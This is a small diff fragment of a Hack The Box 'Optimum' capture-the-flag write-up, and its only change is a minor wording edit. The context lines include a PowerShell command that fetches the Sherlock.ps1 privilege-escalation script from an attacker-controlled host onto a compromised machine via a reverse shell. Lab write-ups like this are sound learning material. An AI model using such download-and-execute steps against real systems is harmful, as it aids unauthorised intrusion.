Hackopotamus/portfolio/_writeups/2026-08-29-htb-optimum.md

 PS C:\Users\kostas\Documents> iwr -uri http://10.10.14.62/Sherlock.ps1 -Outfile Sherlock.ps1
 ```

 We attempt to run `Sherlock.ps1` from our newly created `rev.exe` shell to avoid the issues we encountered previously.
 Unfortunately, the result is another frozen and unresponsive shell.
-This is becoming very frustrating, so we'll make one final attempt to get the tool working before considering whether it's time to ditch it and move on.
+This becomes very frustrating, so we'll make one final attempt to get the tool working before considering whether it's time to ditch it and move on.

 ``` Powershell
 ┌──(kali㉿kali)-[~/Documents/Hack The Box/Machines/Optimum]